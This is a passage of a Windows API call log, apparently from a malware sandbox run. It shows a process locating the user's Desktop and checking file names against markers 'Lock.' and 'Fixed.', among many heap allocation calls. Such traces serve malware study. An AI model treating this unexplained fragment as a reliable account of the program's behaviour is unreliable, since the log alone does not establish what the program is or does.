nFileSizeLow=0x178b5, dwReserved0=0x75, dwReserved1=0x4, cFileName="QzBYTrrsKyNkrz7Qz2.swf", cAlternateFileName="QZBYTR~1.SWF")) returned 0 [0189.012] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0189.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.013] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0189.013] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0189.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.014] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0189.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24202f0 [0189.016] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QzBYTrrsKyNkrz7Qz2.swf", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QzBYTrrsKyNkrz7Qz2.swf", lpFilePart=0x8bf658*="QzBYTrrsKyNkrz7Qz2.swf") returned 0x3c [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0189.016] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QzBYTrrsKyNkrz7Qz2.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qzbytrrskynkrz7qz2.swf")) returned 0xffffffff [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.016] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0189.016] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.016] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0189.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0189.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0189.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SFHBP1D1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FHBP1D1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HBP1D1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BP1D1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P1D1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1D1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LBQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QEeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EeR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0189.018] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0189.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0189.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26) returned 0x249f170 [0189.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0189.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SFHBP1D1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FHBP1D1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HBP1D1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BP1D1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P1D1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1D1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LBQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QEeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EeR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b39d0 [0189.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0189.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0189.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0189.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.021] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0189.021] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0189.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0189.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0189.022] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0189.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.022] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0189.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 